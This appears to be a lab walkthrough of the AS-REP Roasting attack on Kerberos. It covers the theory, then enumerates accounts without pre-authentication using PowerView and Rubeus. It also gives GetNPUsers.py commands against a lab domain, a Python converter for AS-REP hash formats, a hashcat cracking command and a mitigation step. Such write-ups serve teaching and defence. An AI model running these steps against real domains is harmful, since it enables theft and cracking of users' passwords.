AS-REP Roasting Attack

Definition

AS-REP Roasting is an attack against Kerberos that targets user accounts which do not require pre-authentication. Pre-authentication is the first step in Kerberos authentication and is designed to prevent brute-force password guessing attacks.

Theory & Background

During pre-authentication, the user's password is used to encrypt a timestamp, which is sent to the domain controller; the domain controller then attempts to decrypt it and validate the request. If that succeeds, a TGT is issued for the user to use in future authentication.

The AS-REP response has two parts: one is the TGT, encrypted using the KRBTGT account's NTLM hash, and the other is the session key (the enc-part in image 2), which is encrypted using the user account's NTLM hash. If pre-authentication isn't enabled, an attacker can send an AS-REQ for any user that doesn't have preauth required and receive encrypted material back that can be cracked offline to reveal the target user's password. If you're already an authenticated (but otherwise unprivileged) user, you can easily enumerate which users in the domain have this setting with the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304).

Luckily, pre-authentication is required by default in Active Directory. However, this can be controlled by a user account control setting on every user account.

My lab environment for this walkthrough is:

  1. blackwidow@REDWOLF.LOCAL - User with Kerberos pre-authentication disabled

  2. redwolf-dc - Domain Controller

Abuse

There are many tools that can be used to perform an AS-REP Roasting attack; however, I will be demonstrating with Rubeus (for Windows) and GetNPUsers.py (for Linux) from the impacket scripts.

Execution with Rubeus

List the users that have pre-authentication disabled (this command requires PowerView to be loaded in memory):

Get-DomainUser -PreauthNotRequired

Then we can use Rubeus.exe to dump the encrypted session key material present in the AS-REP:

.\Rubeus.exe asreproast /nowrap

Execution with GetNPUsers

Install the impacket scripts (setup.py must be run from the cloned directory):

sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket && sudo python3 ./setup.py install

Enumerate the users present in the domain and use them when executing GetNPUsers.py:

GetNPUsers.py REDWOLF.LOCAL/blackwidow@redwolf.local -dc-ip 192.168.62.2

Cracking the AS-REP Hash

Say this is the hash we get for the potential victim:

$krb5asrep$blackwidow@redwolf.local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

We need to insert 23 (the Kerberos encryption type identifier for RC4-HMAC, which hashcat mode 18200 expects) after $krb5asrep$:

$krb5asrep$23$blackwidow@redwolf.local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

Then we can use john or hashcat to crack the hash:

hashcat -m 18200 '$krb5asrep$23$blackwidow@redwolf.local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' ~/Wordlist/rockyou.txt
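To make the format change above explicit, here is a small parser for the $krb5asrep$ line that converts between the john layout (no etype field) and the hashcat 18200 layout (etype 23 inserted). This is an added example, not code from the original post or from the Rubeus/impacket projects; the sample hash is constructed with dummy hex and the function names are my own.

```python
import re
from dataclasses import dataclass

# One $krb5asrep$ line as emitted by GetNPUsers.py / Rubeus.
# The "<etype>$" field is optional: john omits it, hashcat -m 18200 requires it.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?"
    r"(?P<user>[^@:$]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)


@dataclass
class AsRepHash:
    user: str
    realm: str
    checksum: str    # 16-byte HMAC-MD5 checksum over the enc-part (RC4-HMAC)
    enc_part: str    # RC4-encrypted enc-part of the AS-REP, hex encoded
    etype: int = 23  # 23 = RC4-HMAC; the only etype hashcat mode 18200 handles


def parse_asrep(line: str) -> AsRepHash:
    """Parse one hash line; raise ValueError if it is not a well-formed AS-REP hash."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash line")
    if len(m["enc"]) % 2 != 0:
        raise ValueError("enc-part is not a whole number of bytes")
    etype = int(m["etype"]) if m["etype"] else 23
    return AsRepHash(m["user"], m["realm"], m["checksum"].lower(), m["enc"].lower(), etype)


def to_hashcat(h: AsRepHash) -> str:
    """hashcat -m 18200 layout: etype inserted right after $krb5asrep$."""
    if h.etype != 23:
        raise ValueError("mode 18200 is RC4-HMAC (etype 23) only; AES uses other modes")
    return f"$krb5asrep${h.etype}${h.user}@{h.realm}:{h.checksum}${h.enc_part}"


def to_john(h: AsRepHash) -> str:
    """john krb5asrep layout: no etype field."""
    return f"$krb5asrep${h.user}@{h.realm}:{h.checksum}${h.enc_part}"


# Constructed sample (not a real capture): checksum and enc-part are dummy hex.
SAMPLE_JOHN = "$krb5asrep$blackwidow@REDWOLF.LOCAL:" + "ab" * 16 + "$" + "cd" * 40

if __name__ == "__main__":
    print(to_hashcat(parse_asrep(SAMPLE_JOHN)))
```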

Mitigation

Uncheck 'Do not require Kerberos preauthentication' in the Account Options of the user account. This clears the DONT_REQ_PREAUTH flag (0x400000, decimal 4194304) in userAccountControl, which is the same bit the LDAP filter above searches for.
